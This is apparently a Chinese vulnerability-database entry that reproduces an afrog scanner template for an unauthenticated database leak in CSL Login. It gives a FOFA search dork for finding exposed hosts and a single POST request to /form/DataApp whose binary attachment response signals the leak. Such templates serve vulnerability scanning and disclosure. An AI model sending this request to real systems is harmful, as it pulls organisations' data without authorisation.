csl-login-unauth-db-leak: CSL Login unauthorized DB Leak

日期: 2025-09-01 | 影响软件: CSL Login | POC: 已公开

漏洞描述

FOFA: "csl/login"

PoC代码[已公开]

id: csl-login-unauth-db-leak

info:
  name: CSL Login unauthorized DB Leak
  author: xpoc
  severity: high
  verified: true
  description: |
    FOFA: "csl/login"
  reference:
    - https://nosec.org/home/detail/3032.html
  tags: essl,leak
  created: 2023/06/23

rules:
    r0:
        request:
            method: POST
            path: /form/DataApp
            body: style=1
        expression: |
          response.status == 200 && 
          response.headers["content-type"].contains("application/binary") && 
          response.body.bcontains(b"ZK") && 
          response.raw_header.bcontains(b"attachment")
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/csl-login-unauth-db-leak.yaml

相关漏洞推荐